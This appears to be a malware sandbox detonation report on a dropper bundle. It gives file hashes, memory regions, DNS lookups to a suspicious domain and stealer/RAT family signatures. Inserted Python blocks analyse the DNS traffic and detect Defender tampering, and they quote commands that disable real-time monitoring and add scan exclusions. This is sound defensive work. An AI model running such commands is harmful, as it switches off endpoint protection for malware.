SHA512 f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11

memory/4752-112-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4028-284-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/4572-283-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3012-105-0x0000000000110000-0x0000000000182000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed098e48a54663552b.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/744-103-0x0000000000700000-0x0000000000716000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0961d5d40c7b937c7.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed094d15aaa9a48.exe

MD5 69c4678681165376014646030a4fe7e4
SHA1 fb110dad415ac036c828b51c38debd34045aa0f3
SHA256 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77
SHA512 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed096e68af113.exe

MD5 e90750ecf7d4add59391926ccfc15f51
SHA1 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1
SHA256 b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59
SHA512 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9

memory/3516-81-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3516-80-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3516-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3516-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3516-74-0x000000006494A000-0x000000006494F000-memory.dmp

memory/3516-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3516-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3516-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3516-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/3516-65-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3516-63-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/760-285-0x0000000002410000-0x000000000256D000-memory.dmp

memory/2828-286-0x0000000002720000-0x000000000287D000-memory.dmp

memory/2828-287-0x0000000002C30000-0x0000000002CD6000-memory.dmp

memory/2828-291-0x0000000002CE0000-0x0000000002D73000-memory.dmp

memory/2828-289-0x0000000002CE0000-0x0000000002D73000-memory.dmp

memory/760-314-0x0000000002AD0000-0x0000000002B63000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe

"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe"

C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe

"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe" -u

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 66.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
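Added example, not part of the sandbox report: a small Python parser for the Network table above that separates the sample's forward lookups from PTR queries, converts each PTR name back to the address it reverses, and flags any name re-resolved more than a handful of times inside the capture window. The rows embedded in the block are a constructed excerpt of the table; the 5-query threshold and the 151 s window (this analysis's max network time) are assumptions.

```python
import re
from collections import Counter

# Constructed excerpt of the behavioral14 Network table (the full table has 30
# t.gogamec.com queries and 7 PTR queries inside the ~151 s network window).
NETWORK_ROWS = """\
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
"""

# Column layout of the report's table: Country Destination Domain Proto
ROW = re.compile(r"^(?P<cc>\S+)\s+(?P<dst>\S+)\s+(?P<name>\S+)\s+(?P<proto>\S+)$")
PTR = re.compile(r"^(\d+)\.(\d+)\.(\d+)\.(\d+)\.in-addr\.arpa$", re.I)


def parse_rows(text):
    """Parse the plain-text table into dicts; lines that are not rows are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            rows.append(m.groupdict())
    return rows


def ptr_to_ip(name):
    """Turn a PTR query name (octets reversed, .in-addr.arpa) back into the IPv4 address."""
    m = PTR.match(name)
    if not m:
        return None
    return ".".join(reversed(m.groups()))


def summarise_dns(rows, window_seconds, repeat_threshold=5):
    """Count forward lookups per name, keep PTR targets aside, flag repeated names."""
    forward = Counter()
    reverse_ips = []
    for r in rows:
        ip = ptr_to_ip(r["name"])
        if ip:
            reverse_ips.append(ip)          # tracked separately so they do not dilute the count
        else:
            forward[r["name"].lower()] += 1
    flagged = {
        name: {"queries": n, "per_minute": round(n * 60 / window_seconds, 1)}
        for name, n in forward.items()
        if n >= repeat_threshold
    }
    return {"forward": dict(forward), "reverse_ips": reverse_ips, "flagged": flagged}


if __name__ == "__main__":
    summary = summarise_dns(parse_rows(NETWORK_ROWS), window_seconds=151)
    for name, info in summary["flagged"].items():
        print(f"{name}: {info['queries']} queries, ~{info['per_minute']}/min")
```

On the full table, t.gogamec.com accounts for 30 of the 37 rows, about 12 lookups per minute over 151 s. A process that goes through the Windows resolver gets cached answers, so re-resolution at that rate usually means the queries were not being answered successfully or the process resolves on its own; either way that name is the one to pivot on. PTR lookups are often background resolution rather than the sample's own traffic, which is why the block keeps them out of the forward count.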

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20241010-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
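Added example, not code from the report or from the sample: Python detection logic for what these two powershell.exe instances do. This analysis's process list shows cmd.exe /c powershell ... -Command Set-MpPreference -DisableRealtimeMonitoring $true and ... Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp", both launched by setup_install.exe (PID 2704), which setup_installer.exe (PID 2900) started according to the WriteProcessMemory table. The process records in the block are constructed to mirror that chain; the cmd.exe and powershell.exe PIDs, the -EncodedCommand variant and the benign Get-MpPreference record are assumptions made for the example.

```python
import base64
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Assumed: the same tampering command hidden behind -EncodedCommand (UTF-16LE, base64).
ENCODED = base64.b64encode(
    "Set-MpPreference -DisableRealtimeMonitoring $true".encode("utf-16-le")).decode()

# Constructed process records modelled on the report's process list. PIDs 2900 and
# 2704 come from the WriteProcessMemory table; the remaining PIDs are assumed.
SAMPLE = [
    Proc(2900, 1000, r"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"'),
    Proc(2704, 2900, r"C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe",
         r'"C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe"'),
    Proc(3024, 2704, r"C:\Windows\SysWOW64\cmd.exe",
         r"C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none "
         r"-NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true"),
    Proc(1768, 2704, r"C:\Windows\SysWOW64\cmd.exe",
         r"C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none "
         r'-NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"'),
    Proc(2332, 2704, r"C:\Windows\SysWOW64\cmd.exe",
         r"C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe"),
    Proc(5000, 2704, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         "powershell -nop -w hidden -enc " + ENCODED),
    # Assumed benign: an administrator reading the configuration from a normal shell.
    Proc(4100, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -Command Get-MpPreference"),
]

# PowerShell binds any unambiguous prefix of a parameter name, so
# "-DisableRealtimeMon $true" works as well as the full spelling. The rules therefore
# match a short prefix plus \w*; keep the prefixes unambiguous against the cmdlet's
# real parameter list when tuning them.
_VAL = r"(?::|\s+)\$?(?:true|1)\b"
TAMPER_RULES = [
    ("defender.realtime_off", re.compile(r"Set-MpPreference\b.*-DisableRea\w*" + _VAL, re.I | re.S),
     "real-time monitoring disabled"),
    ("defender.ioav_off", re.compile(r"Set-MpPreference\b.*-DisableIOAV\w*" + _VAL, re.I | re.S),
     "download/attachment (IOAV) scanning disabled"),
    ("defender.behavior_off", re.compile(r"Set-MpPreference\b.*-DisableBeh\w*" + _VAL, re.I | re.S),
     "behaviour monitoring disabled"),
    ("defender.exclusion_added", re.compile(r"Add-MpPreference\b.*-Exclusion\w*", re.I | re.S),
     "Defender exclusion added"),
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (never -ExecutionPolicy).
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncoded(?:command)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.I)


def effective_cmdline(cmdline):
    """Append the decoded -EncodedCommand payload, if any, so the rules see the real script."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def ancestry(procs, pid):
    """Walk parent pointers upwards from pid; returns the chain child-first."""
    by_pid = {p.pid: p for p in procs}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def find_defender_tampering(procs):
    """Return one finding per (process, rule) hit, rated by where the ancestry runs."""
    findings = []
    for p in procs:
        text = effective_cmdline(p.cmdline)
        for rule_id, rx, desc in TAMPER_RULES:
            if rx.search(text):
                chain = ancestry(procs, p.pid)
                # Tampering whose ancestry passes through a user-writable Temp path is the
                # dropper pattern in this report, not an administrator at a console.
                severity = "high" if any(USER_WRITABLE.search(a.image) for a in chain) else "medium"
                findings.append({
                    "pid": p.pid, "rule": rule_id, "desc": desc, "severity": severity,
                    "chain": " -> ".join(a.image.rsplit("\\", 1)[-1] for a in reversed(chain)),
                })
    return findings
```

The cmdlet path is only one way to make these changes: the same settings can be set through the Windows Defender policy keys in the registry or through the MSFT_MpPreference WMI class without any powershell.exe command line, so pair this with registry and WMI telemetry. On current Windows 10/11 builds with Tamper Protection enabled both calls are refused, which makes a call that succeeds on a managed host an alert in its own right; this detonation ran on win7, where no such protection exists.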

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cd42a7c874e44.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
